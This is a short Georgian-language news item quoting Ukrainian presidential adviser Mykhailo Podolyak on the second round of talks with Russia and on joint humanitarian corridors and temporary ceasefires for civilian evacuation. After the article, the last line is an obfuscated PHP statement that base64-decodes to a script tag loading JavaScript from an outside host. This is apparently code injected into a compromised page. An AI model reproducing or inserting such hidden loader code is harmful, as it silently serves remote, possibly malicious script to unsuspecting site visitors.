celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის მრჩევლის მიხაილ პოდოლიაკის განცხადებით, უკრაინის დელეგაციამ რუსეთთან მოლაპარაკებების მეორე რაუნდზე ის შედეგები ვერ მიიღო, რასაც იმედოვნებდა და მესამე რაუნდის ფარგლებში განაგრძობს მოლაპარაკებებს.
 
„დეტალურად განვიხილეთ ჰუმანიტარული ასპექტი, რადგან ახლა ძალიან ბევრი ქალაქია ალყაში, რომლებშიც ვითარება დრამატულია საკვებ პროდუქტებთან, მედიკამენტებთან დაკავშირებით. ძალიან მალე გაიმართება მოლაპარაკებათა მესამე რაუნდი“, - განაცხადა პოდოლიაკმა.
 
ამასთან პოდოლიაკის თქმით, „მხარეებმა ურთიერთგაგებას მიაღწიეს ჰუმანიტარული დერეფნის ერთობლივი უზრუნველყოფის შესახებ მშვიდობიანი მოსახლეობის ევაკუაციისთვის”.
 
„ასევე მედიკამენტების და საკვები პროდუქტები მიწოდებისთვის იმ ადგილებში, სადაც ძლიერი საომარი მოქმედებები მიმდინარეობს, ცეცხლის დროებით შეწყვეტის შესაძლებლობასთან ერთად იმ პერიოდში, როდესაც ევაკუაცია განხორციელდება. ანუ იქ, სადაც იქნება შექმნილი ჰუმანიტარული დერეფანი, დროებით შეწყდება ცეხლი. ამავე მიზნით რუსეთი და უკრაინა უახლოეს პერიოდში შექმნიან კავშირის არხს ურთიერთქმედებისთვის და ფორმირებული იქნება ერთობლივი ლოგისტიკური პროცედურები“ , - განაცხადა პოდოლიაკმა.
858
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");